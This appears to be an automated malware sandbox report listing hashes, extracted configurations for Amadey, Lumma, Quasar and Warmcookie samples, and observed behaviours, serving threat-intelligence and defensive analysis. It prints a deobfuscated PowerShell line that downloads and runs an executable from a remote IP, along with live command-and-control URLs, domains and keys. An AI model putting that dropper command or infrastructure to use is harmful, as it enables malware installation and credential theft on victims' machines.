General

  • Target

    2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer

  • Size

    938KB

  • Sample

    250401-wbgawaszdt

  • MD5

    1cbc80c77a01e855f05fe33a43a8e977

  • SHA1

    1db146c4e6de2e346c0691144cfa17147fc55815

  • SHA256

    78ff4b03b39c789d662f42471312a413b005f73e496a42d4b5e7b8e18cfa84b4

  • SHA512

    453374671899392bf93fa9ea6b1070fd0981832d120092c3c9a839e43438189e8612b487b31bb35ab50595eb5f878c377a23469d746ebb56994d560e4742d91b

  • SSDEEP

    24576:TqDEvCTbMWu7rQYlBQcBiT6rprG8a0Nu:TTvC/MTQYxsWR7a0N

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "YKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE"
2
(new-object system.net.webclient).downloadfile("http://176.113.115.7/mine/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://hadvennture.top/GKsiio

https://anavstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://atargett.top/dsANGt

Extracted

Family

quasar

Version

1.4.1

Botnet

CyberPunk

C2

dakar.wohowoho.com:443

dakar.wohowoho.com:80

206.206.76.75:443

206.206.76.75:80

62.60.226.176:80

62.60.226.176:443

Mutex

5e809a5b-bb22-41b6-af20-5285e99040d3

Attributes
  • encryption_key

    A98DEEE2D49BDF1C5183B3079E9B28E281586F6F

  • install_name

    chrome.exe

  • log_directory

    Logs

  • reconnect_delay

    30000

  • startup_key

    GoogleChrome

  • subdirectory

    Google\Chrome

Extracted

Family

amadey

Version

5.33

Botnet

faec90

Attributes
  • install_dir

    52907c9546

  • install_file

    tgvazx.exe

  • strings_key

    cc9d94f7503394295f4824f8cfd50608

  • url_paths

    /Di0Her478/index.php

rc4.plain
1
64b1343fa8c268c5daa2b75688367d0d

Extracted

Family

warmcookie

C2

192.36.57.50

Attributes
  • mutex

    62580f79-f0e4-46c9-9fe6-041328dce2b7

  • user_agent

    Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

Targets

    • Target

      2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer

    • Size

      938KB

    • MD5

      1cbc80c77a01e855f05fe33a43a8e977

    • SHA1

      1db146c4e6de2e346c0691144cfa17147fc55815

    • SHA256

      78ff4b03b39c789d662f42471312a413b005f73e496a42d4b5e7b8e18cfa84b4

    • SHA512

      453374671899392bf93fa9ea6b1070fd0981832d120092c3c9a839e43438189e8612b487b31bb35ab50595eb5f878c377a23469d746ebb56994d560e4742d91b

    • SSDEEP

      24576:TqDEvCTbMWu7rQYlBQcBiT6rprG8a0Nu:TTvC/MTQYxsWR7a0N

    • Amadey

      Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    • Amadey family

    • Detects Healer an antivirus disabler dropper

    • GCleaner

      GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    • Gcleaner family

    • Healer

      Healer an antivirus disabler dropper.

    • Healer family

    • Lumma Stealer, LummaC

      Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    • Lumma family

    • Modifies Windows Defender DisableAntiSpyware settings

    • Modifies Windows Defender Real-time Protection settings

    • Modifies Windows Defender TamperProtection settings

    • Modifies Windows Defender notification settings

    • Modifies security service

    • Quasar RAT

      Quasar is an open source Remote Access Tool.

    • Quasar family

    • Quasar payload

    • Suspicious use of NtCreateUserProcessOtherParentProcess

    • Warmcookie family

    • Warmcookie, Badspace

      Warmcookie aka Badspace is a backdoor written in C++.

    • Identifies VirtualBox via ACPI registry values (likely anti-VM)

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    • Creates new service(s)

    • Downloads MZ/PE file

    • Possible privilege escalation attempt

    • Sets service image path in registry

    • Stops running service(s)

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Deletes itself

    • Executes dropped EXE

    • Identifies Wine through registry keys

      Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    • Loads dropped DLL

    • Modifies file permissions

    • Reads user/profile data of local email clients

      Email clients store some user data on disk where infostealers will often target it.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Windows security modification

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Drops desktop.ini file(s)

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • AutoIT Executable

      AutoIT scripts compiled to PE executables.

    • Drops file in System32 directory

    • Enumerates processes with tasklist

    • Suspicious use of NtSetInformationThreadHideFromDebugger

    • Suspicious use of SetThreadContext

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.